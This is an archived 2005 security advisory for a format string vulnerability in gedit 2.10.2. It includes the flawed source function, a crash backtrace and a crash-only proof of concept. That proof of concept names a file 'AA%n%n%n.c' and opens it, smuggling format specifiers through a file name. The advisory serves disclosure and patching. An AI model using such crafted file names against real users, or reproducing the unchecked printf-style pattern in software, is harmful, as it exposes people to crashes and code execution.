gedit Format String Flaw May Let Remote Users Cause Arbitrary Code to Be Executed
|
|
SecurityTracker Alert ID: 1014179
|
|
SecurityTracker URL: http://securitytracker.com/id?1014179
|
|
CVE Reference: CAN-2005-1686
(Links to External Site)
|
Date: Jun 13 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 2.10.2
|
Description: A vulnerability was reported in gedit. A remote user may be able to cause arbitrary code to be executed.
A remote user can create a file with a specially crafted filename that, when processed by the target user, will trigger a format
string flaw in gedit and execute arbitrary code. The code will run with the privileges of the target user.
The flaw resides
in the gedit_utils_error_reporting_loading_file () function.
jsk:exworm (www.0xbadexworm.org) discovered this vulnerability.
|
Impact: A remote user may be able to cause arbitrary code to be executed when the target user processes a specially named file.
|
Solution: The vendor has released a fixed version (2.10.3), available at:
http://ftp.gnome.org/pub/GNOME/sources/gedit/2.10/gedit-2.10.3.tar.gz
http://ftp.gnome.org/pub/GNOME/sources/gedit
|
Vendor URL: www.gnome.org/projects/gedit/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: yan feng <jsk@ph4nt0m.net>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: 20 May 2005 20:26:28 -0000
From: yan feng <jsk@ph4nt0m.net>
Subject: pst.advisory: gedit fun. opensource is god .lol windows
|
pst.advisory: gedit fun. opensource is god .lol windows
www.ph4nt0m.org
Systems affected:
gedit 2.10.2
no affected
all exploitable
1:why: gedit is power tool .. it used to edit *.c *.pl *.py ............
when it open a bin .. ths bin's name or filename is format strings ... it is exploitable
2:tips:
void
gedit_utils_error_reporting_loading_file (
const gchar *uri,
const GeditEncoding *encoding,
GError *error,
GtkWindow *parent)
............
if (error_message == NULL)
if ((error == NULL) || (error->message == NULL))
error_message = g_strdup_printf (
_("Could not open the file \"%s\"."),
uri_for_display);................name
else
error_message = g_strdup_printf (
_("Could not open the file \"%s\".\n\n%s."),
uri_for_display, error->message);..........name
g_free (encoding_name);
dialog = gtk_message_dialog_new (
parent,
GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
GTK_MESSAGE_ERROR,
GTK_BUTTONS_OK,
error_message);....................boom......
3: more show
Program received signal SIGSEGV, Segmentation fault.
0x40f9b740 in gtk_window_set_transient_for () from /usr/lib/libgtk-x11-2.0.so.0
(gdb) bt
#0 0x40f9b740 in gtk_window_set_transient_for ()
from /usr/lib/libgtk-x11-2.0.so.0
#1 0x40ea33c9 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
#2 0x080723a1 in gedit_utils_error_reporting_loading_file ()
#3 0x080779f8 in gedit_file_open_from_stdin ()
#4 0x00000000 in ?? ()
#5 0x083f98e8 in ?? ()
#6 0x0813f538 in ?? ()
#7 0x080ad668 in TC_GNOME_Gedit_Application_struct ()
#8 0x08339e30 in ?? ()
#9 0x00000000 in ?? ()
#10 0x41287ca1 in __default_morecore () from /lib/libc.so.6
4: A LAME proof-of-concept
bash-2.05b#cat fmtexp.c
#include <stdio.h>
int
main()
printf("hah gedit\n");
bash-2.05b#gcc -o fk fmtexp.c
bash-2.05b#mv fk AA%n%n%n.c
bash-2.05b#gedit AA%n%n%n.c
no working exploit will be here..:P
CREDIT:
jsk:exworm (www.0xbadexworm.org) discovery this vulnerability
ths: all members from PST and doris
|
|
